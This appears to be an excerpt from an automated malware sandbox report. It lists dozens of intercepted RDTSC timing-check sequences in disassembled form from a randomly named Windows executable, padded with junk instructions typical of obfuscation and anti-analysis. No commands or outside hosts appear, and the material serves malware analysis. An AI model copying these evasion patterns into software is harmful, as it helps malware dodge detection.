Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9FAAE1 second address: 9FAB00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2769h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9FAC6B second address: 9FAC75 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9899183FECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9FAC75 second address: 9FAC91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jp 00007F98991A2756h 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ja 00007F98991A2780h 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F98991A2756h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9FAEF8 second address: 9FAF19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9899183FF2h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F9899183FE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9FAF19 second address: 9FAF1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A039A5 second address: A039BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9899183FF2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A039BB second address: A039C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A039C3 second address: A039CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A039CB second address: A039E0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F98991A2756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F98991A278Fh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A02682 second address: A02686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A02686 second address: A0268C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A0268C second address: A026A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9899183FECh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A026A4 second address: A026A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A026A8 second address: A026B2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9899183FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A02943 second address: A02979 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F98991A2756h 0x00000008 jmp 00007F98991A275Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jnp 00007F98991A2756h 0x00000016 pushad 0x00000017 popad 0x00000018 pop ebx 0x00000019 jmp 00007F98991A2760h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A02979 second address: A02996 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A02C81 second address: A02CA4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F98991A2758h 0x00000008 jmp 00007F98991A275Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F98991A2756h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A02DE6 second address: A02DEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A0234A second address: A02391 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F98991A2756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F98991A2764h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jne 00007F98991A2756h 0x0000001b jmp 00007F98991A2762h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 jnl 00007F98991A2756h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A02391 second address: A0239B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9899183FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A0239B second address: A023A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 js 00007F98991A275Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A0305C second address: A03060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A0330B second address: A03313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A03313 second address: A03317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A03317 second address: A0331D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A0331D second address: A03350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push edx 0x0000000a jmp 00007F9899183FEAh 0x0000000f pop edx 0x00000010 jl 00007F9899184002h 0x00000016 jmp 00007F9899183FF6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A03699 second address: A036CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98991A2767h 0x00000009 jc 00007F98991A2756h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F98991A275Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A036CC second address: A036D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F9899183FE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A0B81F second address: A0B823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A0B823 second address: A0B831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F9899183FF2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A0B831 second address: A0B837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A0BB28 second address: A0BB83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jc 00007F9899183FE6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop eax 0x0000000f jnp 00007F9899183FFDh 0x00000015 jmp 00007F9899183FF7h 0x0000001a popad 0x0000001b pushad 0x0000001c jmp 00007F9899183FF2h 0x00000021 pushad 0x00000022 jmp 00007F9899183FF4h 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A0BCF3 second address: A0BD06 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F98991A275Ch 0x00000008 jg 00007F98991A2756h 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A0BD06 second address: A0BD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A0C432 second address: A0C439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A1142D second address: A11437 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9899183FEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A11437 second address: A11440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D1015 second address: 9D1105 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9899183FF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F9899183FF8h 0x00000010 xchg eax, ebx 0x00000011 movsx ecx, dx 0x00000014 mov di, 90BDh 0x00000018 push dword ptr fs:[00000000h] 0x0000001f call 00007F9899183FF2h 0x00000024 xor dword ptr [ebp+1247219Dh], esi 0x0000002a pop edx 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F9899183FE8h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c sbb dx, E154h 0x00000051 mov ecx, dword ptr [ebp+122D3926h] 0x00000057 mov dword ptr [ebp+12487D62h], esp 0x0000005d jno 00007F9899183FECh 0x00000063 cmp dword ptr [ebp+122D3906h], 00000000h 0x0000006a jne 00007F98991840C7h 0x00000070 mov byte ptr [ebp+122D1B96h], 00000047h 0x00000077 mov ecx, dword ptr [ebp+122D390Ah] 0x0000007d mov eax, D49AA7D2h 0x00000082 jmp 00007F9899183FF4h 0x00000087 nop 0x00000088 push eax 0x00000089 push edx 0x0000008a jmp 00007F9899183FF6h 0x0000008f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D1105 second address: 9D110B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D110B second address: 9D110F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D110F second address: 9D1131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2762h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F98991A275Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D1636 second address: 9D1640 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9899183FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D1ECB second address: 9D1ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D206B second address: 9D206F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D206F second address: 9D2073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A1063E second address: A10643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A10643 second address: A1064C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A10E62 second address: A10E68 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A10E68 second address: A10E70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A162DF second address: A162F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F9899183FEBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A162F3 second address: A16323 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2769h 0x00000007 jmp 00007F98991A275Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A16323 second address: A16339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9899183FF0h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A15B99 second address: A15B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A15B9D second address: A15BA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A15E42 second address: A15E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A15E46 second address: A15E4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A15E4A second address: A15E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jp 00007F98991A2756h 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A15E5A second address: A15E7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A15E7B second address: A15E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A1841A second address: A18432 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FEFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A18432 second address: A18464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F98991A275Dh 0x0000000b popad 0x0000000c jmp 00007F98991A2768h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A18464 second address: A18472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9899183FEAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A185EB second address: A1860D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F98991A2769h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A1C8DE second address: A1C8E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A1C8E5 second address: A1C8EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A1CBC7 second address: A1CBD1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A1CBD1 second address: A1CBE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98991A275Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A1CBE1 second address: A1CBE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A1CBE7 second address: A1CBED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A1CFF8 second address: A1D015 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9899183FF5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A1D015 second address: A1D030 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2767h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A1D1E4 second address: A1D1EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2322B second address: A23235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pushad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A21C7B second address: A21C7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A21DDE second address: A21DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A21DE4 second address: A21E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9899183FE6h 0x0000000a popad 0x0000000b jmp 00007F9899183FF7h 0x00000010 pop ebx 0x00000011 ja 00007F9899184011h 0x00000017 jbe 00007F9899183FF9h 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A21FDB second address: A21FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 985149 second address: 98514D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D0F16 second address: 9ACBD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jnl 00007F98991A2756h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 pop esi 0x00000014 nop 0x00000015 lea eax, dword ptr [ebp+12487D0Ah] 0x0000001b nop 0x0000001c push esi 0x0000001d jnl 00007F98991A2765h 0x00000023 jmp 00007F98991A275Fh 0x00000028 pop esi 0x00000029 push eax 0x0000002a push esi 0x0000002b jmp 00007F98991A275Eh 0x00000030 pop esi 0x00000031 nop 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007F98991A2758h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000017h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c mov ecx, dword ptr [ebp+122D387Ah] 0x00000052 call dword ptr [ebp+122D2879h] 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b pushad 0x0000005c popad 0x0000005d jmp 00007F98991A275Eh 0x00000062 jmp 00007F98991A2769h 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D1C69 second address: 9D1C77 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9899183FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D1C77 second address: 9D1C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A268C6 second address: A268F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF9h 0x00000007 push esi 0x00000008 jns 00007F9899183FE6h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007F9899183FE6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A268F5 second address: A26903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F98991A275Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A26903 second address: A26909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A26C2A second address: A26C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98991A275Fh 0x00000009 ja 00007F98991A275Ch 0x0000000f jng 00007F98991A276Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A26C55 second address: A26C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A26C59 second address: A26C5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2F731 second address: A2F735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2F735 second address: A2F746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jnp 00007F98991A2756h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
